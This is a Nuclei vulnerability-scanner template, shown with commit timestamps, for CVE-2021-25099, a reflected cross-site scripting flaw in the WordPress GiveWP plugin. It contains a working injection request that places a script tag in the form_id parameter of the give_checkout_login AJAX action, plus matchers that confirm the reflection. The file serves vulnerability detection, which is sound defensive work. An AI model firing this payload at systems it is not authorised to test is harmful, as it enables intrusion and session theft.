nuclei-templates/http/cves/2021/CVE-2021-25099.yaml

51 lines
2.3 KiB
YAML
Raw Normal View History

2022-12-12 16:23:16 +00:00
id: CVE-2021-25099
info:
name: WordPress GiveWP <2.17.3 - Cross-Site Scripting
2022-12-12 16:23:16 +00:00
author: theamanrawat
severity: medium
description: |
WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:09:01 +00:00
remediation: |
Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability.
2022-12-12 16:23:16 +00:00
reference:
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
- https://wordpress.org/plugins/give/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
- https://plugins.trac.wordpress.org/changeset/2659032
2022-12-12 16:23:16 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-12-12 16:23:16 +00:00
cve-id: CVE-2021-25099
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.001
epss-percentile: 0.40761
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
2022-12-12 16:23:16 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: givewp
product: givewp
2023-09-06 12:09:01 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: xss,cve2021,wp,give,wordpress,cve,wp-plugin,unauth,wpscan,givewp
2022-12-12 16:23:16 +00:00
http:
2022-12-12 16:23:16 +00:00
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
2022-12-12 18:17:01 +00:00
- 'contains(body, "give_user_login")'
2022-12-12 16:23:16 +00:00
condition: and
# digest: 4a0a0047304502202b189be7e937901d941220faa1b4f83c5c44224e83965a07c24b86dea6a94cac022100b94af79e45ef584c56fa986052d59a3e04814c2139014b1d52825f44dfe3fe1d:922c64590222798bb761d5b6d8e72950